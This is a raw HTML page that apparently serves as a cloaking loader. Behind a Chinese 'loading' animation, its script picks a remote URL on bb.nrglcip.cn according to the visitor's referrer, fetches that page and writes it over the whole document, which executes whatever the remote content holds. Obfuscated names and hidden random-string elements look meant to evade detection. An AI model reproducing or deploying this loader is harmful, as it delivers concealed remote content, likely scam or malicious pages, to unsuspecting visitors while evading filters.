<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .QF2MHJ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .QF2MHJ .OVCfwe7WO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .QF2MHJ .content {
            line-height: 50px;
            text-align: center
        }

        .QF2MHJ .img {
            width: 100%
        }

        .QF2MHJ .rGyqkj {
            text-align: center
        }

        .QF2MHJ .rGyqkj span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .QF2MHJ .rGyqkj span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .QF2MHJ .rGyqkj span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .QF2MHJ .rGyqkj span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .QF2MHJ .rGyqkj span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .QF2MHJ .rGyqkj span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .QF2MHJ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function UkcoZHS1nIrQG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var YCn3WQ = UkcoZHS1nIrQG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ YCn3WQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ YCn3WQ +".html?a=share";
		}
		
        BmBfGkCMoh=url+"#"+new Date().getTime();
        BmBfGkCMoh && function() {
            $.get(BmBfGkCMoh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >tPQrYHM9yhls</h1>
<span style='display:none'>oq5phmzzM59s3f5ZFJn</span>
<span style='display:none'>oq5phmzzM59s3f5ZFJn</span>
<ul style='display:none' >Le9EXMklmpFCZbwCYI8jOM</ul>
<ul style='display:none' >Le9EXMklmpFCZbwCYI8jOM</ul><div class="QF2MHJ">
    <div class="OVCfwe7WO">
        <div class="rGyqkj">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>PbnyG26kiZMHeJWsZviQnydUnnEfucpR0TyAkNJIjcB7ZdCzCHV</span>
<ul style='display:none' >y9kpb3KntV5SQlK6D8EeaPTssGPgZ00Bn1ohj0VlTQXL4u5xPlHGp8gGgiB1wTBEanRg2NEnDwsGTfjUI</ul>
<h1 style='display:none' >t7dAjWpt4OaV5Uq4U0Tw0LnR6LuBzPNHHJzXkxUgikk07QqOb62MThi56QfhNqGq7lThULobDb9T</h1>
<b style='display:none' >Qd0cJSPgZGhyamIfkLA8WCTFiXn9x12piNoz5ziXEKwnKrBJsx4Nbm1C0JcdtxdDOQkwsfqv0p1JNDYC0SziU0QF6h</b>
<p  style='display:none'>VecGnI8mAGK</p></body>
</html>